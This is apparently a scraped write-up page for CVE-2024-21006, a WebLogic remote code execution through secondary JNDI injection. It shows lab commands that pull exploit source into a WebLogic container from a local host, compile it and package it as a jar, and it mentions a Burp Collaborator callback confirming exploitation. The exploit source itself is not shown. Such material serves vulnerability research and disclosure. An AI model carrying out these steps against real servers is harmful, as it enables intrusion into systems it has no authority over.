search

WebLogic - CVE-2024-21006

CVE-2024-21006 reveals a new WebLogic attack method: secondary JNDI injection, that is, triggering JNDI injection during the JNDI injection process, thereby completing RCE.

Project is based on the findings of pwnullarrow-up-right and code from momika223arrow-up-right.

hashtag
Proof-of-Concept

hashtag
Oracle 14.1.1.0

apt :: ~ » docker container ls
CONTAINER ID   IMAGE                                                        COMMAND                  CREATED        STATUS       PORTS                                                                                  NAMES
fa9822b7dfd5   container-registry.oracle.com/middleware/weblogic:14.1.1.0   "/u01/oracle/createA…"   23 hours ago   Up 2 hours   0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp   14110-weblogic

Prepare the environment by uploading MainClass.java and META-INF/MANIFEST.MF to the WebLogic container.

[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MainClass.java
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MANIFEST.MF
[oracle@14110-weblogic lib]$ mkdir META-INF
[oracle@14110-weblogic lib]$ mv MANIFEST.MF META-INF/

Compile the code.

[oracle@14110-weblogic lib]$ javac -cp /u01/oracle/wlserver/server/lib/weblogic.jar MainClass.java
[oracle@14110-weblogic lib]$ ls -al | grep MainClass
-rw-rw-r-- 1 oracle oracle    2033 Oct 10 08:03 MainClass$1.class
-rw-rw-r-- 1 oracle oracle    1386 Oct 10 08:03 MainClass.class
-rw-rw-r-- 1 oracle oracle    3717 Oct 10 08:01 MainClass.java

[oracle@14110-weblogic lib]$ jar cvfm cve-2024-21006.jar META-INF/MANIFEST.MF *.class
added manifest
adding: MainClass$1.class(in = 2033) (out= 671)(deflated 66%)
adding: MainClass.class(in = 2161) (out= 1100)(deflated 49%)
Burp Collaborator callback indicating a successful exploit attempt

hashtag
Source code

Last updated